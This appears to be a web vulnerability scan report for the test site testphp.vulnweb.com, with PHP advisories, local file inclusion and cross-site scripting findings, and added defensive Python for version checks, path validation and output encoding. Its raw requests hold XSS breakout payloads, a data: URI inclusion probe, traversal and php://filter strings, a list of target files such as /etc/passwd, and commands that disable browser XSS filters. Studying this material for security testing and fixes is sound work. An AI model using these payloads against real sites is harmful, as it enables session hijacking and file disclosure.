** DISPUTED ** The GNU Multiple Precision Arithmetic Library (GMP) interfaces for PHP through 7.1.4 allow attackers to cause a denial of service (memory consumption and application crash) via operations on long strings. NOTE: the vendor disputes this, stating "There is no security issue here, because GMP safely aborts in case of an OOM condition. The only attack vector here is denial of service. However, if you allow attacker-controlled, unbounded allocations you have a DoS vector regardless of GMP's OOM behavior."
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
In PHP versions before 7.4.31, 8.0.24 and 8.1.11, the phar uncompressor code would recursively uncompress "quines" gzip files, resulting in an infinite loop.
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H
In PHP versions before 7.4.31, 8.0.24 and 8.1.11, the vulnerability enables network and same-site attackers to set a standard insecure cookie in the victim's browser which is treated as a `__Host-` or `__Secure-` cookie by PHP applications.
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N
An issue was discovered in PHP 7.3.x before 7.3.0alpha3, 7.2.x before 7.2.8, and before 7.1.20. The php-fpm master process restarts a child process in an endless loop when using program execution functions (e.g., passthru, exec, shell_exec, or system) with a non-blocking STDIN stream, causing this master process to consume 100% of the CPU, and consume disk space with a large volume of error logs, as demonstrated by an attack by a customer of a shared-hosting facility.
CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H
GET / HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.71 Safari/537.36
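Matching a disclosed version against the advisories above is the step this finding leaves to the reader, so here is an added example of that check. It is not Invicti's version-matching logic. The X-Powered-By header values are constructed (the report does not print the disclosed version), and the fixed-in versions are transcribed from the advisory wording above under one rule: "before X" means first fixed in X for that branch, "through X" means first fixed in the patch release after X, and a branch older than every listed fix never received it.

```python
"""Decide which of the PHP advisories listed above apply to a disclosed
version. Added example; not Invicti's logic. Fixed-in versions are
transcribed from the advisory texts above, header values are constructed."""
import re

# (description, lowest affected branch or None, first fixed version per branch)
ADVISORIES = [
    ("double free in the format printer (7.x before 7.0.1)", (7, 0), [(7, 0, 1)]),
    ("EXIF uninitialized read in exif_process_IFD_in_TIFF", None,
     [(7, 1, 27), (7, 2, 16), (7, 3, 3)]),
    ("zend_string_extend negative length (through 7.1.5)", None, [(7, 1, 6)]),
    ("httpoxy HTTP_PROXY handling (through 7.0.8)", None, [(7, 0, 9)]),
    ("phar recursive gzip quine", None, [(7, 4, 31), (8, 0, 24), (8, 1, 11)]),
    ("__Host-/__Secure- cookie prefix bypass", None, [(7, 4, 31), (8, 0, 24), (8, 1, 11)]),
]


def parse_version(header_value):
    """Pull major.minor.patch out of an X-Powered-By (or Server) header value."""
    m = re.search(r"PHP/(\d+)\.(\d+)\.(\d+)", header_value)
    if not m:
        raise ValueError(f"no PHP version in {header_value!r}")
    return tuple(int(x) for x in m.groups())


def is_affected(version, floor, fixes):
    branch = version[:2]
    if floor is not None and branch < floor:
        return False                        # advisory does not cover this branch
    for fixed in fixes:
        if fixed[:2] == branch:
            return version < fixed          # same branch: compare patch level
    # No fix listed for this branch. A branch older than every fixed branch
    # (an EOL 7.0.x against "before 7.1.27") never got the fix; a newer branch
    # was released after it.
    return branch < min(f[:2] for f in fixes)


def affected_advisories(header_value):
    v = parse_version(header_value)
    return [desc for desc, floor, fixes in ADVISORIES if is_affected(v, floor, fixes)]


if __name__ == "__main__":
    for hdr in ("X-Powered-By: PHP/7.0.33", "X-Powered-By: PHP/8.0.20",
                "X-Powered-By: PHP/8.1.12"):
        print(hdr, "->", affected_advisories(hdr))
```

Two caveats when you run this against a real banner: distributions backport fixes without changing the reported version, so a version match is a reason to ask for the package changelog rather than a verdict, and a banner can be wrong or absent (the Version Disclosure findings show it is present here, which is itself something to switch off with expose_php = Off).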
Invicti Standard identified a probable Local File Inclusion vulnerability, which occurs when a file from the target system is injected into the attacked server page.
Even though Invicti Standard believes there is a high possibility of a local file inclusion here, it could not confirm it. There can be numerous reasons for Invicti Standard being unable to confirm it. We strongly recommend you investigate the issue manually to ensure it is a local file inclusion and needs to be addressed. You can also consider sending us the details of this issue so we can address it next time and give you more precise results.
Files an attacker typically targets through such an inclusion include:
/etc/passwd
/apache/logs/error.log
/apache/logs/access.log
The probe below names no file at all. It passes a data: URI whose base64 body is a scanner marker (TlM3NzU0NTYxNDQ2NTc1 decodes to NS7754561446575), so a marker that comes back in the response shows that the file parameter reaches a PHP call that honours stream wrappers. The same sink will usually accept ../ traversal and php://filter, and if that call is include rather than a plain read, the same vector leads to code execution.
Method | Parameter | Parameter Type | Value |
---|---|---|---|
GET | file | Querystring | data:;base64,TlM3NzU0NTYxNDQ2NTc1 |
GET | size | Querystring | 160 |
GET /showimage.php?file=data%3a%3bbase64%2cTlM3NzU0NTYxNDQ2NTc1&size=160 HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Cookie: login=test%2Ftest
Referer: http://testphp.vulnweb.com/search.php?test=query
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.71 Safari/537.36
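The probe value in the request above is not a path at all but a data: URI whose base64 part decodes to a scanner marker (NS7754561446575). A response that reflects that marker shows the `file` parameter reaches a PHP filesystem function that honours stream wrappers, which is the same sink that lets ../ sequences read arbitrary files. The check below is an example added to this page, not code from the report or from the target application: it refuses anything carrying a URL scheme or a NUL byte, joins and resolves the requested value under the web root, and requires the result to stay inside that root and to be an image file. The web root layout, the `pictures/1.jpg` stub and the extra probe strings beyond the report's own are constructed fixtures.

```python
import re
import tempfile
from pathlib import Path
from typing import Dict, Optional

# Anything that begins like a URL scheme (data:, php:, file:, http:, ...). PHP's filesystem
# functions treat such values as stream wrappers, so they must never reach the sink.
SCHEME_RE = re.compile(r"^[A-Za-z][A-Za-z0-9+.\-]*:")
ALLOWED_SUFFIXES = {".jpg", ".jpeg", ".png", ".gif"}


def resolve_image_path(web_root, requested: str) -> Optional[Path]:
    """Return the real path of the requested image, or None if the value is not acceptable."""
    if not requested or "\x00" in requested:      # NUL bytes truncate paths in C-backed APIs
        return None
    if SCHEME_RE.match(requested):                # data:, php://, file://, ... rejected outright
        return None
    root = Path(web_root).resolve()
    # Join first, then resolve: this collapses ../ segments and follows symlinks, so the
    # containment test below is made against the real filesystem location.
    candidate = (root / requested).resolve()
    try:
        candidate.relative_to(root)               # raises ValueError when outside the root
    except ValueError:
        return None
    if candidate.suffix.lower() not in ALLOWED_SUFFIXES or not candidate.is_file():
        return None
    return candidate


def demo() -> Dict[str, bool]:
    """Run the report's probe value plus a few classic LFI shapes against a throwaway web root.

    Returns {probe: accepted}. The directory layout is a constructed fixture."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp) / "htdocs"
        (root / "pictures").mkdir(parents=True)
        (root / "pictures" / "1.jpg").write_bytes(b"\xff\xd8\xff\xe0")   # JPEG magic, stub file
        (Path(tmp) / "secret.txt").write_text("one level above the web root")
        probes = [
            "pictures/1.jpg",                                   # legitimate request
            "data:;base64,TlM3NzU0NTYxNDQ2NTc1",                # the scanner's probe from the report
            "../secret.txt",                                    # traversal out of the root
            "/etc/passwd",                                      # absolute path
            "php://filter/convert.base64-encode/resource=index.php",  # source disclosure wrapper
            "pictures/1.jpg\x00.txt",                           # NUL-byte truncation trick
        ]
        return {p: resolve_image_path(root, p) is not None for p in probes}


if __name__ == "__main__":
    for probe, accepted in demo().items():
        print(f"{'accept' if accepted else 'reject':6}  {probe!r}")
```

The scheme check runs before any filesystem call on purpose: `Path.resolve()` would happily treat `data:;base64,...` as a relative file name and report it as missing, which hides the real problem (the value should never have been eligible as a path) behind a generic not-found.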
PCI DSS v3.2 | 6.5.8 |
---|---|
PCI DSS v4.0 | 6.2.4 |
OWASP 2013 | A4 |
OWASP 2017 | A5 |
CWE | 22 |
CAPEC | 252 |
WASC | 33 |
HIPAA | 164.306(a) |
ASVS 4.0 | 5.3.9 |
NIST SP 800-53 | SI-10 |
DISA STIG | V-6164 |
ISO27001 | A.14.2.5 |
ISO27001 2022 | A.8.26 |
ISO27001 2022 | A.8.27 |
ISO27001 2022 | A.8.28 |
OWASP Top Ten 2021 | A01 |
CVSS 3.0 SCORE | |
---|---|
Base | 8.6 (High) |
Temporal | 8.6 (High) |
Environmental | 8.6 (High) |
CVSS Vector String |
---|
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N |
CVSS 3.1 SCORE | |
---|---|
Base | 8.6 (High) |
Temporal | 8.6 (High) |
Environmental | 8.6 (High) |
CVSS Vector String |
---|
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N |
CVSS 4.0 Score | |
---|---|
6.9 / Medium | |
Exploitability | High |
Complexity | High |
Vulnerable system | Low |
Subsequent system | Low |
Exploitation | High |
Security requirements | Medium |
CVSS Vector String |
---|
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:L/SI:L/SA:L |
Invicti Standard detected Cross-site Scripting, which allows an attacker to execute a dynamic script (JavaScript, VBScript) in the context of the application.
This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by a user has been interpreted as HTML/JavaScript/VBScript by the browser. Cross-site scripting targets the users of the application instead of the server. Although this is a limitation, an attacker might target an administrator and, by hijacking that session, gain full control over the application.
Method | Parameter | Parameter Type | Value |
---|---|---|---|
POST | phpaction | Post | echo $_POST[comment]; |
POST | comment | Post | |
POST | Submit | Post | Submit |
POST | name | Post | </title><scRipt>netsparker(0x005D06)</scRipt> |
Method | Parameter | Parameter Type | Value |
---|---|---|---|
POST | submit | Post | add message |
POST | text | Post | <scRipt>netsparker(0x002188)</scRipt> |
POST | name | Post | anonymous user |
Method | Parameter | Parameter Type | Value |
---|---|---|---|
POST | submit | Post | add message |
POST | text | Post | |
POST | name | Post | <scRipt>netsparker(0x00218A)</scRipt> |
Method | Parameter | Parameter Type | Value |
---|---|---|---|
GET | pp | Querystring | x" onmouseover=netsparker(0x003049) x=" |
Method | Parameter | Parameter Type | Value |
---|---|---|---|
GET | p | Querystring | <scRipt>netsparker(0x004FDC)</scRipt> |
GET | pp | Querystring | 12 |
GET | aaaa%2f | Querystring |
Method | Parameter | Parameter Type | Value |
---|---|---|---|
GET | p | Querystring | valid |
GET | pp | Querystring | <scRipt>netsparker(0x004FDE)</scRipt> |
GET | aaaa%2f | Querystring |
Method | Parameter | Parameter Type | Value |
---|---|---|---|
GET | artist | Querystring | <scRipt>netsparker(0x00437A)</scRipt> |
Method | Parameter | Parameter Type | Value |
---|---|---|---|
GET | cat | Querystring | <scRipt>netsparker(0x001FDA)</scRipt> |
Method | Parameter | Parameter Type | Value |
---|---|---|---|
POST | searchFor | Post | <scRipt>netsparker(0x001A9D)</scRipt> |
POST | goButton | Post | go |
POST | test | Querystring | query |
Method | Parameter | Parameter Type | Value |
---|---|---|---|
POST | uaddress | Post | |
POST | signup | Post | signup |
POST | uphone | Post | |
POST | urname | Post | |
POST | ucc | Post | |
POST | uemail | Post | |
POST | upass | Post | |
POST | upass2 | Post | |
POST | uuname | Post | <scRipt>netsparker(0x004C31)</scRipt> |
Method | Parameter | Parameter Type | Value |
---|---|---|---|
POST | uaddress | Post | 3 |
POST | signup | Post | signup |
POST | uphone | Post | 3 |
POST | urname | Post | '"--></style></scRipt><scRipt>netsparker(0x004C9E)</scRipt> |
POST | ucc | Post | 4916613944329494 |
POST | uemail | Post | netsparker@example.com |
POST | upass | Post | N3tsp@rker- |
POST | upass2 | Post | N3tsp@rker- |
POST | uuname | Post | Smith |
POST /secured/newuser.php HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Content-Length: 207
Content-Type: application/x-www-form-urlencoded
Cookie: login=test%2Ftest
Referer: http://testphp.vulnweb.com/signup.php
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.71 Safari/537.36
uemail=netsparker%40example.com&uaddress=3&ucc=4916613944329494&upass2=N3tsp%40rker-&uuname=Smith&upass=N3tsp%40rker-&uphone=3&urname='"--></style></scRipt><scRipt>netsparker(0x004C9E)</scRipt>&signup=signup
Method | Parameter | Parameter Type | Value |
---|---|---|---|
POST | uaddress | Post | 3 |
POST | signup | Post | signup |
POST | uphone | Post | 3 |
POST | urname | Post | Smith |
POST | ucc | Post | 4916613944329494 |
POST | uemail | Post | '"--></style></scRipt><scRipt>netsparker(0x004B2A)</scRipt> |
POST | upass | Post | N3tsp@rker- |
POST | upass2 | Post | N3tsp@rker- |
POST | uuname | Post | Smith |
POST /secured/newuser.php HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Content-Length: 188
Content-Type: application/x-www-form-urlencoded
Cookie: login=test%2Ftest
Referer: http://testphp.vulnweb.com/signup.php
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.71 Safari/537.36
uemail='"--></style></scRipt><scRipt>netsparker(0x004B2A)</scRipt>&uaddress=3&ucc=4916613944329494&upass2=N3tsp%40rker-&uuname=Smith&upass=N3tsp%40rker-&uphone=3&urname=Smith&signup=signup
Method | Parameter | Parameter Type | Value |
---|---|---|---|
POST | uaddress | Post | 3 |
POST | signup | Post | signup |
POST | uphone | Post | 3 |
POST | urname | Post | Smith |
POST | ucc | Post | '"--></style></scRipt><scRipt>netsparker(0x004B2D)</scRipt> |
POST | uemail | Post | netsparker@example.com |
POST | upass | Post | N3tsp@rker- |
POST | upass2 | Post | N3tsp@rker- |
POST | uuname | Post | Smith |
POST /secured/newuser.php HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Content-Length: 196
Content-Type: application/x-www-form-urlencoded
Cookie: login=test%2Ftest
Referer: http://testphp.vulnweb.com/signup.php
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.71 Safari/537.36
uemail=netsparker%40example.com&uaddress=3&ucc='"--></style></scRipt><scRipt>netsparker(0x004B2D)</scRipt>&upass2=N3tsp%40rker-&uuname=Smith&upass=N3tsp%40rker-&uphone=3&urname=Smith&signup=signup
Method | Parameter | Parameter Type | Value |
---|---|---|---|
POST | uaddress | Post | 3 |
POST | signup | Post | signup |
POST | uphone | Post | '"--></style></scRipt><scRipt>netsparker(0x004C9B)</scRipt> |
POST | urname | Post | Smith |
POST | ucc | Post | 4916613944329494 |
POST | uemail | Post | netsparker@example.com |
POST | upass | Post | N3tsp@rker- |
POST | upass2 | Post | N3tsp@rker- |
POST | uuname | Post | Smith |
POST /secured/newuser.php HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Content-Length: 211
Content-Type: application/x-www-form-urlencoded
Cookie: login=test%2Ftest
Referer: http://testphp.vulnweb.com/signup.php
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.71 Safari/537.36
uemail=netsparker%40example.com&uaddress=3&ucc=4916613944329494&upass2=N3tsp%40rker-&uuname=Smith&upass=N3tsp%40rker-&uphone='"--></style></scRipt><scRipt>netsparker(0x004C9B)</scRipt>&urname=Smith&signup=signup
Method | Parameter | Parameter Type | Value |
---|---|---|---|
POST | uaddress | Post | '"--></style></scRipt><scRipt>netsparker(0x004B27)</scRipt> |
POST | signup | Post | signup |
POST | uphone | Post | 3 |
POST | urname | Post | Smith |
POST | ucc | Post | 4916613944329494 |
POST | uemail | Post | netsparker@example.com |
POST | upass | Post | N3tsp@rker- |
POST | upass2 | Post | N3tsp@rker- |
POST | uuname | Post | Smith |
POST /secured/newuser.php HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Content-Length: 211
Content-Type: application/x-www-form-urlencoded
Cookie: login=test%2Ftest
Referer: http://testphp.vulnweb.com/signup.php
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.71 Safari/537.36
uemail=netsparker%40example.com&uaddress='"--></style></scRipt><scRipt>netsparker(0x004B27)</scRipt>&ucc=4916613944329494&upass2=N3tsp%40rker-&uuname=Smith&upass=N3tsp%40rker-&uphone=3&urname=Smith&signup=signup
The issue occurs because the browser interprets the input as active HTML, JavaScript or VBScript. To avoid this, output should be encoded according to the output location and context. For example, if the output goes in to a JavaScript block within the HTML document, then output needs to be encoded accordingly. Encoding can get very complex, therefore it's strongly recommended to use an encoding library such as OWASP ESAPI and Microsoft Anti-cross-site scripting.
Additionally, you should implement a strong Content Security Policy (CSP) as a defense-in-depth measure if an XSS vulnerability is mistakenly introduced. Due to the complexity of XSS-Prevention and the lack of secure standard behavior in programming languages and frameworks, XSS vulnerabilities are still common in web applications.
CSP will act as a safeguard that can prevent an attacker from successfully exploiting Cross-site Scripting vulnerabilities in your website and is advised in any kind of application. Please make sure to scan your application again with Content Security Policy checks enabled after implementing CSP, in order to avoid common mistakes that can impact the effectiveness of your policy. There are a few pitfalls that can render your CSP policy useless and we highly recommend reading the resources linked in the reference section before you start to implement one.
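The remediation above says to encode according to output context, and the report's probes show why a single encoder is not enough: `'"--></style></scRipt><scRipt>netsparker(0x004C9E)</scRipt>` is built to break out of a quoted attribute, a style block and a script block in one string, while `x" onmouseover=netsparker(0x003049) x="` targets an attribute alone. The code below is an added example, not code from the report or from the target application. It renders one user-supplied value (the `urname` field from the signup requests) into three contexts with a matching encoder for each, attaches a nonce-based Content Security Policy as the defense-in-depth layer the text recommends, and includes a check that no script tag other than the page's own survives. The page template and the header handling are assumptions made for the example.

```python
import html
import re
import secrets
from typing import Dict, Tuple

# Probe strings copied from the report's evidence tables.
PAYLOAD_BREAKOUT = "'\"--></style></scRipt><scRipt>netsparker(0x004C9E)</scRipt>"
PAYLOAD_ATTRIBUTE = 'x" onmouseover=netsparker(0x003049) x="'


def encode_html_text(value: str) -> str:
    """Context: text between tags. &, <, >, " and ' become entities, so no tag can open."""
    return html.escape(value, quote=True)


def encode_html_attribute(value: str) -> str:
    """Context: inside a double-quoted attribute value. Same entity set as above; here the
    encoded quote is what keeps the attribute from being closed early."""
    return html.escape(value, quote=True)


def encode_js_string(value: str) -> str:
    """Context: inside a JavaScript string literal within a <script> block.

    Everything except ASCII letters and digits is hex-escaped. The HTML parser runs before
    the JavaScript parser, so a literal '</script>' inside the string would end the block
    regardless of quoting; escaping '<' and '/' removes that possibility entirely."""
    out = []
    for ch in value:
        if ch.isascii() and ch.isalnum():
            out.append(ch)
        elif ord(ch) < 0x100:
            out.append(f"\\x{ord(ch):02x}")
        else:
            # Non-Latin-1 characters: emit UTF-16 code units (a surrogate pair for astral ones).
            units = ch.encode("utf-16-be")
            out.extend(f"\\u{(units[i] << 8) | units[i + 1]:04x}" for i in range(0, len(units), 2))
    return "".join(out)


def csp_header(nonce: str) -> str:
    """Strict, nonce-based policy: only scripts carrying this response's nonce may run."""
    return (f"script-src 'nonce-{nonce}' 'strict-dynamic'; object-src 'none'; "
            f"base-uri 'none'; frame-ancestors 'none'")


def render_welcome(urname: str) -> Tuple[Dict[str, str], str]:
    """Render the signup name into three output contexts, each with its own encoder."""
    nonce = secrets.token_urlsafe(16)
    body = (
        f"<p>Welcome, {encode_html_text(urname)}</p>\n"
        f'<input type="text" name="urname" value="{encode_html_attribute(urname)}">\n'
        f'<script nonce="{nonce}">var urname = "{encode_js_string(urname)}";</script>'
    )
    return {"Content-Security-Policy": csp_header(nonce)}, body


_SCRIPT_TAG = re.compile(r"<\s*/?\s*script", re.IGNORECASE)


def breakout_survived(body: str) -> bool:
    """True if the rendered page contains any script tag beyond the template's own pair."""
    return len(_SCRIPT_TAG.findall(body)) > 2


if __name__ == "__main__":
    for payload in (PAYLOAD_BREAKOUT, PAYLOAD_ATTRIBUTE):
        headers, body = render_welcome(payload)
        print(headers["Content-Security-Policy"])
        print(body, "\nbreakout:", breakout_survived(body), "\n")
```

The same encoders apply to the frame-injection findings later in this report: the injected `<iframe>` is reflected HTML, not a URL the application chose to frame, so the fix is output encoding rather than URL validation. The CSP is the second line: with `'strict-dynamic'` and a per-response nonce, an inline `<scRipt>` that slips past encoding still does not execute, and `frame-ancestors 'none'` stops the page itself from being framed.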
Generated XSS exploit might not work due to browser XSS filtering. Please follow the guidelines below in order to disable XSS filtering for different browsers. Note that Chrome removed its XSS Auditor in version 78 and Firefox has never shipped a reflected-XSS filter, so with current versions of those browsers there is nothing to disable and the reflected payload should execute as-is.
Chrome (versions before 78 only)
chrome.exe --args --disable-xss-auditor
Internet Explorer
Firefox
Type about:config in the URL address bar and set the preference to false by double clicking the row.
Safari
To disable the auditor:
defaults write com.apple.Safari "com.apple.Safari.ContentPageGroupIdentifier.WebKit2XSSAuditorEnabled" -bool FALSE
To re-enable it after testing:
defaults write com.apple.Safari "com.apple.Safari.ContentPageGroupIdentifier.WebKit2XSSAuditorEnabled" -bool TRUE
PCI DSS v3.2 | 6.5.7 |
---|---|
PCI DSS v4.0 | 6.2.4 |
OWASP 2013 | A3 |
OWASP 2017 | A7 |
CWE | 79 |
CAPEC | 19 |
WASC | 8 |
HIPAA | 164.308(a) |
ASVS 4.0 | 5.3.3 |
NIST SP 800-53 | SI-15 |
DISA STIG | V-16811 |
ISO27001 | A.14.2.5 |
ISO27001 2022 | A.8.26 |
ISO27001 2022 | A.8.27 |
ISO27001 2022 | A.8.28 |
OWASP Top Ten 2021 | A03 |
CVSS 3.0 SCORE | |
---|---|
Base | 7.4 (High) |
Temporal | 7.4 (High) |
Environmental | 7.4 (High) |
CVSS Vector String |
---|
CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N |
CVSS 3.1 SCORE | |
---|---|
Base | 7.4 (High) |
Temporal | 7.4 (High) |
Environmental | 7.4 (High) |
CVSS Vector String |
---|
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N |
CVSS 4.0 Score | |
---|---|
5.1 / Medium | |
Exploitability | Medium |
Complexity | High |
Vulnerable system | Low |
Subsequent system | Low |
Exploitation | High |
Security requirements | Medium |
CVSS Vector String |
---|
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:L/VA:N/SC:L/SI:L/SA:N |
Invicti Standard identified the target web site is using class.upload.php and detected that it is out of date.
class.upload.php in verot.net class.upload before 1.0.3 and 2.x before 2.0.4, as used in the K2 extension for Joomla! and other products, omits .phar from the set of dangerous file extensions.
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
class.upload.php in verot.net class.upload through 1.0.3 and 2.x through 2.0.4, as used in the K2 extension for Joomla! and other products, omits .pht from the set of dangerous file extensions, a similar issue to CVE-2019-19576.
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
GET / HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: 082119f75623eb7abd7bf357698ff66c
Acunetix-Aspect-Queries: filelist;aspectalerts;packages
Acunetix-Aspect-ScanID: d0351b4b-e62d-417e-82fb-a118ba627995
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.71 Safari/537.36
Invicti Standard identified the target web site is using phpmailer and detected that it is out of date.
PHPMailer before 6.5.0 on Windows allows remote code execution if lang_path is untrusted data and has a UNC pathname.
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
PHPMailer 6.4.1 and earlier contain a vulnerability that can result in untrusted code being called (if such code is injected into the host project's scope by other means). If the $patternselect parameter to validateAddress() is set to 'php' (the default, defined by PHPMailer::$validator), and the global namespace contains a function called php, it will be called in preference to the built-in validator of the same name. Mitigated in PHPMailer 6.5.0 by denying the use of simple strings as validator function names.
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
PHPMailer 6.1.8 through 6.4.0 allows object injection through Phar Deserialization via addAttachment with a UNC pathname. NOTE: this is similar to CVE-2018-19296, but arose because 6.1.8 fixed a functionality problem in which UNC pathnames were always considered unreadable by PHPMailer, even in safe contexts. As an unintended side effect, this fix eliminated the code that blocked addAttachment exploitation.
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
GET / HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: 082119f75623eb7abd7bf357698ff66c
Acunetix-Aspect-Queries: filelist;aspectalerts;packages
Acunetix-Aspect-ScanID: d0351b4b-e62d-417e-82fb-a118ba627995
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.71 Safari/537.36
Invicti Standard identified the target web site is using phpunit and detected that it is out of date.
Util/PHP/eval-stdin.php in PHPUnit before 4.8.28 and 5.x before 5.6.3 allows remote attackers to execute arbitrary PHP code via HTTP POST data beginning with a "<?php " substring, as demonstrated by an attack on a site with an exposed /vendor folder, i.e., external access to the /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php URI.
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
GET / HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: 082119f75623eb7abd7bf357698ff66c
Acunetix-Aspect-Queries: filelist;aspectalerts;packages
Acunetix-Aspect-ScanID: d0351b4b-e62d-417e-82fb-a118ba627995
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.71 Safari/537.36
Invicti Standard identified the target web site is using smarty and detected that it is out of date.
Smarty is a template engine for PHP, facilitating the separation of presentation (HTML/CSS) from application logic. Prior to versions 3.1.43 and 4.0.3, template authors could run restricted static php methods. Users should upgrade to version 3.1.43 or 4.0.3 to receive a patch.
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Smarty is a template engine for PHP, facilitating the separation of presentation (HTML/CSS) from application logic. Prior to versions 3.1.42 and 4.0.2, template authors could run arbitrary PHP code by crafting a malicious math string. If a math string was passed through as user provided data to the math function, external users could run arbitrary PHP code by crafting a malicious math string. Users should upgrade to version 3.1.42 or 4.0.2 to receive a patch.
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Smarty is a template engine for PHP, facilitating the separation of presentation (HTML/CSS) from application logic. Prior to versions 3.1.45 and 4.1.1, template authors could inject php code by choosing a malicious {block} name or {include} file name. Sites that cannot fully trust template authors should upgrade to versions 3.1.45 or 4.1.1 to receive a patch for this issue. There are currently no known workarounds.
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
In Smarty before 3.1.47 and 4.x before 4.2.1, libs/plugins/function.mailto.php allows XSS. A web page that uses smarty_function_mailto, and that could be parameterized using GET or POST input parameters, could allow injection of JavaScript code by a user.
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
Smarty is a template engine for PHP. In affected versions smarty did not properly escape javascript code. An attacker could exploit this vulnerability to execute arbitrary JavaScript code in the context of the user's browser session. This may lead to unauthorized access to sensitive user data, manipulation of the web application's behavior, or unauthorized actions performed on behalf of the user. Users are advised to upgrade to either version 3.1.48 or to 4.3.1 to resolve this issue. There are no known workarounds for this vulnerability.
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
GET / HTTP/1.1
Host: testphp.vulnweb.com
